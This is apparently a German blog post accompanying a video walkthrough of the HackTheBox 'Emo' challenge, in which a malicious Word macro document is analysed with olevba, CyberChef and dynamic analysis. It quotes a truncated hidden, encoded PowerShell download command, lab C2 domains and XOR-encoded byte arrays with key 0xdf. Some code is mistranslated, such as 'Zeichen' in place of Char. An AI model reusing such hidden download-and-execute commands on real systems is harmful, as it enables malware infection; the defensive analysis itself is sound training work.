Wir haben ein Office-Dokument analysiert, in das ein in Visual Basic geschriebener Makrocode eingebettet ist. Das Dokument soll eine Ransomware-Infektion verursachen, also haben wir eine statische Analyse durchgeführt, bei der relevante Zeichenfolgen extrahiert, der MD5-Hash und Metadaten berechnet und die versteckte Makroroutine mithilfe von Tools wie olevba aufgedeckt wurden. Anschließend haben wir den Hash an Online-Analyse-Engines wie VirusTotal übermittelt und festgestellt, dass er bösartig ist, da er einen Powershell-Befehl ausführt, der den C2-Server kontaktiert, um weitere Payloads herunterzuladen. Wir haben auch Fälle von XOR-Verschlüsselung sowie den XOR-Schlüssel gefunden, der dann zum Entschlüsseln von Zeichen verwendet wurde, die zuvor in Dezimalform codiert wurden. Dies war Teil von HackTheBox Emo-Herausforderung.
Holen Sie sich Hinweise zum OSCP-Zertifikat
Der komplette praktische Kurs zum Penetrationstest von Webanwendungen
Beschreibung der Herausforderung
Die WearRansom-Ransomware ist gerade in unserem Unternehmen ausgebrochen. Das SOC hat den ersten Zugriff auf einen Phishing-Angriff zurückverfolgt, ein Word-Dokument mit Makros. Sehen Sie sich das Dokument an und prüfen Sie, ob Sie weitere Informationen zur Malware und möglicherweise eine Markierung finden können.
Video-Highlights
In diesem Video schlüpfen wir in die Rolle eines Incident Responders und analysieren ein bösartiges Office-Word-Dokument, das einen bösartigen Makrocode enthält, der Powershell ausführt, eine XOR-Verschlüsselung durchführt und einen Command-and-Control-Server aufruft, um weitere Payloads auf dem infizierten Computer abzulegen. Im Grunde werden wir also den infizierten Computer isolieren, vom Internet abschneiden und ihn zur Analyse klonen.
Als erstes beginnen wir mit einer statischen Malware-Analyse, indem wir mehrere Befehle ausführen, z. B. relevante Zeichenfolgen aus der Probe extrahieren, den MD5-Hash berechnen und die Makroroutinen mithilfe einiger Tools wie olevba und oledump.py extrahieren.
Die Makroroutine enthält die Befehle und die Nutzlasten, die auf dem Computer ausgeführt werden, einschließlich des Powershell-Befehls. Nach der statischen Analyse führen wir die dynamische Analyse durch, die die gestarteten Prozesse, Netzwerkverbindungen, geänderten Registrierungsschlüssel und ausgelösten Ereignisse aufdeckt. Außerdem müssen Sie den Zeitstempel berücksichtigen, wenn Sie die Ereignisse in der Ereignisanzeige nachschlagen. Wenn Sie also während der dynamischen Analyse beispielsweise das bösartige Dokument um 19:35 Uhr geöffnet haben, müssen Sie diese Zeit verwenden und die Ereignisse filtern, die genau zum angegebenen Zeitstempel ausgelöst wurden.
Den dynamischen Analysebericht dieser Probe finden Sie unter beliebig.laufen
Nachfolgend sind einige der Domänen aufgeführt, mit denen die Probe kommuniziert hat.
da-industrial.htb daprofesional.htb www.outspokenvisions.htb dagranitegiare.htb mobsouk.htb biglaughs.htb ngllogistics.htbUnten sehen Sie den Powershell-Befehl, der aus dem dynamischen Analysebericht hervorgeht
Powershell -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPA
Der obige Powershell-Befehl wird mit Cyberchef unter Verwendung von frombase64 dekodiert und Nullbytes werden entfernt. Dadurch erhalten Sie die vollständige Nutzlast, aus der wir die folgenden Variablendeklarationen hervorheben können:
$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)
$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)
Wenn wir Chardecode und Dezimalzahlen in Cyberchef verwenden, erhalten wir eine verschlüsselte Zeichenfolge mit XOR, deren Schlüssel 0xdf ist und in der Zeile zu finden ist, die das Folgende in der ursprünglichen Nutzlast hervorhebt, nachdem es in Cyberchef dekodiert wurde.
+= ([Byte][Zeichen]${_} -bxor 0xdf)
Video-Komplettlösung
